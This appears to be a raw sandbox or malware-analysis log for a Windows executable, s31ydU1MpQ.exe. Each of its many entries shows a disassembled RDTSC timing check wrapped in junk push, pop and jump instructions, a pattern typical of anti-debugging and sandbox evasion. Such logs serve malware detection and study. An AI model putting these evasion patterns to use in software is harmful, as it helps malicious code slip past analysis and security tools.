Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87125B second address: 87126E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCBAD522AAAh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87126E second address: 871296 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBACB2D116h 0x00000008 jmp 00007FCBACB2D121h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jnc 00007FCBACB2D116h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871433 second address: 871437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871437 second address: 871442 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871584 second address: 871590 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871590 second address: 871596 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 871596 second address: 8715C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBAD522AB4h 0x00000009 jmp 00007FCBAD522AB3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 879BF7 second address: 879C19 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FCBACB2D128h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 879C19 second address: 879C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 879C1D second address: 879C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push ebx 0x0000000a jmp 00007FCBACB2D11Eh 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877CFF second address: 877D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCBAD522AAFh 0x0000000d jmp 00007FCBAD522AB7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877D2D second address: 877D46 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBACB2D118h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FCBACB2D11Ah 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877EBF second address: 877ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FCBAD522AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877ECF second address: 877ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBACB2D116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877ED9 second address: 877EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877EDD second address: 877EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 877EE3 second address: 877EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8781CE second address: 8781D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8781D3 second address: 8781DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8781DF second address: 8781E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8781E5 second address: 8781E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878383 second address: 878397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ah 0x00000007 jo 00007FCBACB2D116h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878397 second address: 87839D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C29 second address: 878C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C34 second address: 878C3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C3E second address: 878C55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C55 second address: 878C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AAFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C68 second address: 878C78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FCBACB2D116h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 878C78 second address: 878C8E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBAD522AA6h 0x00000008 jmp 00007FCBAD522AACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8778F1 second address: 8778F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8778F7 second address: 8778FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87C068 second address: 87C070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87C070 second address: 87C083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FCBAD522AA6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jbe 00007FCBAD522AA6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87C083 second address: 87C0CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FCBACB2D116h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FCBACB2D127h 0x00000012 jmp 00007FCBACB2D129h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d je 00007FCBACB2D116h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87C0CE second address: 87C0D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87BF23 second address: 87BF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FCBACB2D116h 0x0000000b jno 00007FCBACB2D116h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 87BF35 second address: 87BF44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FCBAD522AA6h 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8813FB second address: 881430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jc 00007FCBACB2D12Ch 0x0000000d jmp 00007FCBACB2D124h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FCBACB2D120h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 881430 second address: 881434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 881434 second address: 881443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FCBACB2D116h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 881572 second address: 88159E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnc 00007FCBAD522AA6h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FCBAD522AB6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 88159E second address: 8815A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8816CA second address: 8816CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8816CE second address: 8816D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 882EA6 second address: 882EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBAD522AB3h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FCBAD522AA6h 0x00000013 jmp 00007FCBAD522AB6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 882EDD second address: 882EF4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBACB2D116h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FCBACB2D134h 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8850DB second address: 8850E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8850E1 second address: 8850F3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBACB2D118h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FCBACB2D116h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8850F3 second address: 8850F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8850F7 second address: 885103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 885103 second address: 88513E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jl 00007FCBAD522AA6h 0x0000000c pop edx 0x0000000d jmp 00007FCBAD522AB7h 0x00000012 pushad 0x00000013 jmp 00007FCBAD522AACh 0x00000018 ja 00007FCBAD522AA6h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 88F609 second address: 88F60D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 891AB9 second address: 891ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 891ABD second address: 891AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 891AC1 second address: 891AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 891AC7 second address: 891ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 891ACD second address: 891AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jns 00007FCBAD522AA6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8917E4 second address: 8917E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 89B541 second address: 89B545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 89FF68 second address: 89FF74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FCBACB2D116h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 89FF74 second address: 89FFB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCBAD522AAAh 0x00000010 jmp 00007FCBAD522AB5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 89FFB2 second address: 89FFB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 89FFB8 second address: 89FFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8A6C0F second address: 8A6C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8A6C15 second address: 8A6C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8A6AAA second address: 8A6AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8A6AAE second address: 8A6AE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB4h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FCBAD522AB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC4AC second address: 8AC4C0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBACB2D116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FCBACB2D116h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC4C0 second address: 8AC4C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC4C4 second address: 8AC4FF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBACB2D116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FCBACB2D129h 0x0000000f push ebx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FCBACB2D11Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC4FF second address: 8AC50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FCBAD522AA8h 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC50F second address: 8AC515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8AC654 second address: 8AC658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8ACA67 second address: 8ACA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8ACA6D second address: 8ACA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8ACF18 second address: 8ACF1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8ACF1D second address: 8ACF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FCBAD522AA6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8BE64E second address: 8BE674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCBACB2D11Fh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBACB2D11Ch 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8BE674 second address: 8BE679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8BE679 second address: 8BE682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8C1BD6 second address: 8C1BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8C1BDE second address: 8C1BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8C1BE2 second address: 8C1BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8BBF3A second address: 8BBF58 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBACB2D11Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FCBACB2D151h 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007FCBACB2D116h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4AC4 second address: 8E4AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jo 00007FCBAD522AAEh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4AD7 second address: 8E4ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4ADB second address: 8E4AF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AAEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FCBAD522AA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4AF5 second address: 8E4AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E4AF9 second address: 8E4B16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBAD522AB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39A3 second address: 8E39A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39A7 second address: 8E39AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39AD second address: 8E39C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FCBACB2D122h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 8E39C9 second address: 8E39CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
